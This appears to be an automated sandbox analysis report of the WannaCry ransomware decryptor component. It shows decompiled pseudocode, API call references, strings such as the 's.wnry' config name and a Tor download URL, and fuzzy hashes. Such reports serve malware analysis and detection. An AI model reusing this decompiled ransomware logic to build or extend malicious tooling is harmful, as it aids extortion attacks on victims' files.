                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
                                  				char* _v4;
                                  				char _v8;
                                  				void* _v12;
                                  				char* _t14;
                                  				char _t15;
                                  				char* _t17;
                                  				struct HWND__* _t18;
                                  				char _t23;
                                  
                                  				_t14 = _a4;
                                  				if(_t14[0xc] != 0x201) {
                                  					L5:
                                  					 *_a8 = 0;
                                  					return _t14;
                                  				}
                                  				_t23 = _t14[0x18];
                                  				_t15 = _t14[0x1c];
                                  				_v8 = _t15;
                                  				_t17 = _t15 - _t23 + 1;
                                  				_v12 = _t23;
                                  				_push(_t17);
                                  				L00412CEC();
                                  				_v4 = _t17;
                                  				if(_t17 != 0) {
                                  					_t18 = __ecx + 0x4c0;
                                  					if(_t18 != 0) {
                                  						_t18 =  *(_t18 + 0x20);
                                  					}
                                  					SendMessageA(_t18, 0x44b, 0,  &_v12);
                                  					ShellExecuteA(0, "open", _v4, 0, 0, 5);
                                  					_t14 = _v4;
                                  					_push(_t14);
                                  					L00412C98();
                                  					goto L5;
                                  				}
                                  				return _t17;
                                  			}












                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: 010bc53f78863e2019c084ea90a161dec355dfc7908859746d80e941f6143737
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135B3);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t30;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x8a);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
                                  				_v12 = 1;
                                  				L00412C8C();
                                  				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
                                  				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
                                  				 *((intOrPtr*)(__ecx)) = 0x415958;
                                  				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
                                  				 *[fs:0x0] = _v20;
                                  				return __ecx;
                                  			}








                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                  				char _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v24;
                                  				intOrPtr _t24;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413809);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t24;
                                  				_push(__ecx);
                                  				_push(_a4);
                                  				_push(0x89);
                                  				_v16 = __ecx;
                                  				L00412C92();
                                  				_v12 = 0;
                                  				L00412DA6();
                                  				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                  				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                  				_push(0x421798);
                                  				_v12 = 3;
                                  				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                  				L00412DA0();
                                  				 *[fs:0x0] = _v24;
                                  				return __ecx;
                                  			}








                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t23;
                                  				int _t25;
                                  				intOrPtr _t30;
                                  				int _t38;
                                  				int _t41;
                                  				intOrPtr* _t43;
                                  				int _t45;
                                  				intOrPtr _t47;
                                  				struct HDC__* _t50;
                                  				intOrPtr _t52;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041407B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t52;
                                  				_t47 = __ecx;
                                  				_v20 = __ecx;
                                  				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                  				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                  				_t50 = 0;
                                  				_v4 = 1;
                                  				if(_t23 == 0) {
                                  					 *((intOrPtr*)(__ecx + 8)) = 0;
                                  					 *(__ecx + 4) = 0;
                                  				} else {
                                  					_t41 =  *(__ecx + 0x24);
                                  					_t45 =  *(__ecx + 0x20);
                                  					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                  					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                  					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                  					if(__ecx != 0) {
                                  						_t50 =  *(__ecx + 4);
                                  					}
                                  					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                  					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                  					if(_t23 != 0) {
                                  						_t23 =  *((intOrPtr*)(_t23 + 4));
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					} else {
                                  						_push(_t23);
                                  						_push( *((intOrPtr*)(_t47 + 4)));
                                  						L00412E48();
                                  					}
                                  				}
                                  				_t43 = _t47 + 0x10;
                                  				_v16 = _t43;
                                  				 *_t43 = 0x415c00;
                                  				_v4 = 2;
                                  				L00412D52();
                                  				 *_t43 = 0x415bec;
                                  				_v4 = 0xffffffff;
                                  				L00412E3C();
                                  				 *[fs:0x0] = _v12;
                                  				return _t23;
                                  			}


















                                  APIs
                                  • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                  • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                  • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                  • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5785$#2414#640
                                  • String ID:
                                  • API String ID: 2719443296-0
                                  • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                  • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                  • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00404530(void* __ecx) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v32;
                                  				void* _v36;
                                  				struct tagSIZE _v48;
                                  				void* _v56;
                                  				intOrPtr _v60;
                                  				intOrPtr _v64;
                                  				int _t21;
                                  				void* _t22;
                                  				intOrPtr _t41;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004137C8);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t41;
                                  				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                  				if(_t21 == 0) {
                                  					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                  					if(_t21 != 0) {
                                  						_push(__ecx);
                                  						L00412DEE();
                                  						_t22 = __ecx + 0x48;
                                  						_push(_t22);
                                  						_v8 = 0;
                                  						L00412DCA();
                                  						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                  						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                  						_push(_t22);
                                  						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                  						L00412DCA();
                                  						 *((char*)(__ecx + 0x5a)) = 1;
                                  						_v32 = 0xffffffff;
                                  						L00412DE8();
                                  					}
                                  				}
                                  				 *[fs:0x0] = _v12;
                                  				return _t21;
                                  			}















                                  APIs
                                  • #289.MFC42 ref: 0040455F
                                  • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                  • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                  • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                  • #613.MFC42 ref: 004045BB
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#289#613ExtentPoint32Text
                                  • String ID:
                                  • API String ID: 888490064-0
                                  • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                  • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                  • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00406CF0(void* __ecx, intOrPtr _a4) {
                                  				int _v12;
                                  				intOrPtr _v20;
                                  				void* _v28;
                                  				char _v36;
                                  				intOrPtr _v40;
                                  				void* _v48;
                                  				struct HWND__* _t16;
                                  				void* _t21;
                                  				void* _t34;
                                  				intOrPtr _t36;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413E78);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t36;
                                  				_t34 = __ecx;
                                  				_t16 = __ecx + 0x4c0;
                                  				if(_t16 != 0) {
                                  					_t16 =  *(_t16 + 0x20);
                                  				}
                                  				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                  				_push(0);
                                  				_push(_a4);
                                  				L00412F44();
                                  				_v12 = 0;
                                  				_v48 =  &_v36;
                                  				_v40 = E00406DA0;
                                  				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
                                  				L00412F3E();
                                  				_t21 = E00406DC0(_t34);
                                  				_v12 = 0xffffffff;
                                  				L00412F38();
                                  				 *[fs:0x0] = _v20;
                                  				return _t21;
                                  			}














                                  APIs
                                  • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                  • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,765920C0), ref: 00406D39
                                  • SendMessageA.USER32 ref: 00406D69
                                  • #1979.MFC42 ref: 00406D6F
                                  • #665.MFC42 ref: 00406D87
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#1979#353#665
                                  • String ID:
                                  • API String ID: 3794212480-0
                                  • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                  • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                  • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00407DB0(void* __eflags) {
                                  				intOrPtr _v4;
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				void* _v100;
                                  				char _v196;
                                  				void* _t14;
                                  				intOrPtr _t16;
                                  				intOrPtr _t22;
                                  				void* _t23;
                                  				intOrPtr* _t24;
                                  				intOrPtr _t26;
                                  				void* _t28;
                                  
                                  				 *[fs:0x0] = _t26;
                                  				E00401000( &_v196, 0);
                                  				_t24 = __imp__time;
                                  				_v8 = 0;
                                  				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                  				_t22 =  *0x4218a0; // 0x0
                                  				_t28 = _t26 - 0xb8 + 4;
                                  				if(_t14 - _t22 < 0x12c) {
                                  					_v36 = 0;
                                  				}
                                  				_v32 = 0;
                                  				L00412B72();
                                  				_t16 = _v28;
                                  				if(_t16 >= 0) {
                                  					_t16 =  *_t24(0);
                                  					_t28 = _t28 + 4;
                                  					 *0x4218a0 = _t16;
                                  				}
                                  				 *0x4218a4 =  *0x4218a4 + 1;
                                  				_v4 = 1;
                                  				L00412C9E();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t16;
                                  			}



















                                  APIs
                                    • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                    • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                  • time.MSVCRT ref: 00407DEA
                                  • #2514.MFC42 ref: 00407E18
                                  • time.MSVCRT ref: 00407E2A
                                  • #765.MFC42 ref: 00407E49
                                  • #641.MFC42 ref: 00407E5D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: time$#2514#324#567#641#765
                                  • String ID:
                                  • API String ID: 3372871541-0
                                  • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                  • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                  • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E004031A0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t15;
                                  				intOrPtr* _t24;
                                  				intOrPtr* _t25;
                                  				intOrPtr _t30;
                                  
                                  				_push(0xffffffff);
                                  				_push(E004135FF);
                                  				_t15 =  *[fs:0x0];
                                  				_push(_t15);
                                  				 *[fs:0x0] = _t30;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t24 = __ecx + 0xec;
                                  				_v16 = _t24;
                                  				 *_t24 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t24 = 0x415bec;
                                  				_t25 = __ecx + 0xe0;
                                  				_v16 = _t25;
                                  				 *_t25 = 0x415c00;
                                  				_v4 = 5;
                                  				L00412D52();
                                  				 *_t25 = 0x415bec;
                                  				_v4 = 1;
                                  				L00412D4C();
                                  				_v4 = 0;
                                  				L00412D3A();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t15;
                                  			}












                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                  • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                  • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                  • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                  • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#616#641#693
                                  • String ID:
                                  • API String ID: 1164084425-0
                                  • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                  • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                  • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040BE90(char* _a4, char* _a8, char* _a12) {
                                  
                                  				strncpy("s.wnry", _a4, 0x63);
                                  				strncpy("https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip", _a8, 0x63);
                                  				strncpy(0x4221ac, _a12, 0x63);
                                  				return 0;
                                  			}



                                  0x0040be9c
                                  0x0040bead
                                  0x0040bebe
                                  0x0040bec8

                                  APIs
                                  Strings
                                  • https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip, xrefs: 0040BEA8
                                  • s.wnry, xrefs: 0040BE97
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strncpy
                                  • String ID: https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry
                                  • API String ID: 3301158039-3000313716
                                  • Opcode ID: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction ID: 9df85d4950b3c0e310111636eb28cd84c7ce5d082e56baf833a5c0d57e8a6ec4
                                  • Opcode Fuzzy Hash: 903ad34784ae10f582f3ba96602ae2cf194015f8b356b40d98df9960d5e2a5fd
                                  • Instruction Fuzzy Hash: 47D017B138C2007AE124BA96EE93E2A22959F88F05F50454AB744550C0E9E99BA0836A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00403AF0(void* __edi, void* __ebp) {
                                  				int _v4;
                                  				intOrPtr _v12;
                                  				char _v1252;
                                  				void _v2251;
                                  				char _v2252;
                                  				int _v2256;
                                  				signed int _t43;
                                  				signed char _t44;
                                  				signed int _t52;
                                  				signed int _t58;
                                  				signed int _t75;
                                  				signed int _t78;
                                  				struct _IO_FILE* _t103;
                                  				intOrPtr _t111;
                                  				void* _t113;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041369B);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t111;
                                  				_t103 = fopen("f.wnry", "rt");
                                  				_t113 = _t111 - 0x8c4 + 8;
                                  				if(_t103 != 0) {
                                  					E00401E90( &_v1252, __eflags);
                                  					_v4 = 0;
                                  					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                  					__eflags = _t43;
                                  					if(_t43 != 0) {
                                  						_t44 =  *(_t103 + 0xc);
                                  						_v2256 = 0;
                                  						__eflags = _t44 & 0x00000010;
                                  						if((_t44 & 0x00000010) == 0) {
                                  							while(1) {
                                  								_v2252 = 0;
                                  								memset( &_v2251, 0, 0xf9 << 2);
                                  								asm("stosw");
                                  								asm("stosb");
                                  								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                  								_t113 = _t113 + 0x18;
                                  								__eflags = _t52;
                                  								if(_t52 == 0) {
                                  									break;
                                  								}
                                  								asm("repne scasb");
                                  								_t75 = 0xbadbac;
                                  								__eflags = 0xbadbac;
                                  								if(0xbadbac != 0) {
                                  									while(1) {
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										L9:
                                  										asm("repne scasb");
                                  										_t78 =  !(_t78 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                  											goto L10;
                                  										}
                                  										asm("repne scasb");
                                  										__eflags =  !(_t78 | 0xffffffff) != 1;
                                  										if( !(_t78 | 0xffffffff) != 1) {
                                  											_t58 = E00402650( &_v1252,  &_v2252);
                                  											__eflags = _t58;
                                  											if(_t58 != 0) {
                                  												_t29 =  &_v2256;
                                  												 *_t29 = _v2256 + 1;
                                  												__eflags =  *_t29;
                                  											}
                                  										}
                                  										goto L14;
                                  										L10:
                                  										asm("repne scasb");
                                  										_t75 =  !(_t78 | 0xffffffff) - 1;
                                  										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                  										asm("repne scasb");
                                  										_t78 =  !(_t75 | 0xffffffff) - 1;
                                  										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                  										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                  											goto L10;
                                  										}
                                  										goto L9;
                                  									}
                                  								}
                                  								L14:
                                  								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                  								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                  									continue;
                                  								}
                                  								break;
                                  							}
                                  						}
                                  						fclose(_t103);
                                  						__eflags = _v2256;
                                  						_t36 = _v2256 > 0;
                                  						__eflags = _t36;
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						 *[fs:0x0] = _v12;
                                  						return 0 | _t36;
                                  					} else {
                                  						_v4 = 0xffffffff;
                                  						E00401F30( &_v1252);
                                  						__eflags = 0;
                                  						 *[fs:0x0] = _v12;
                                  						return 0;
                                  					}
                                  				} else {
                                  					 *[fs:0x0] = _v12;
                                  					return 0;
                                  				}
                                  			}



















                                  APIs
                                  Strings
